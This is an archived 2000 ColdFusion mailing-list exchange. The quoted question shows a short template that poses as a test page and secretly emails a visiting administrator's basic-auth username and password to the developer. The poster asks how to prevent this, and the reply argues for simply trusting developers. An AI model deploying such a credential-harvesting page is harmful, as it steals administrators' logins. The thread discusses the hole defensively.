If you can't trust your developers then you need new people. We trust every
faceless programmer who works on any software that we load on our
workstations and servers. We trust consultants not to create backdoors when
brought in, and, in developer shoes, we trust the Admins not to misuse their
power. So, in short, you have to maintain a certain amount of trust, that's
how the world works.
Steve
----- Original Message -----
From: "Jamie Jackson" <[EMAIL PROTECTED]>
To: "CF-Talk" <[EMAIL PROTECTED]>
Sent: Friday, November 03, 2000 11:21 AM
Subject: Security hole in basic authorization... Solutions?
Say I'm a developer, but not a not a SysAdmin.
It is too easy for me to get an administrator's username/password like
this, using Win2k basic authorization:
Hey, administrator, I'm troubleshooting a template, would you see if
the test passes?:
<html><body>
Test Passed! Thanks, for checking, administrator!
<cfmail to="[EMAIL PROTECTED]" from="[EMAIL PROTECTED]" subject="Got Root!">
#cgi.auth_user#
#cgi.auth_password#
</cfmail>
</body></html>
How do I prevent this from working?
Thanks,
Jamie
----------------------------------------------------------------------------
--------------------
Archives: http://www.mail-archive.com/[email protected]/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=sts or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]
----------------------------------------------------------------------------
--------------------
Archives: http://www.mail-archive.com/[email protected]/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]
------------------------------------------------------------------------------------------------
Archives: http://www.mail-archive.com/[email protected]/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message
with 'unsubscribe' in the body to [EMAIL PROTECTED]
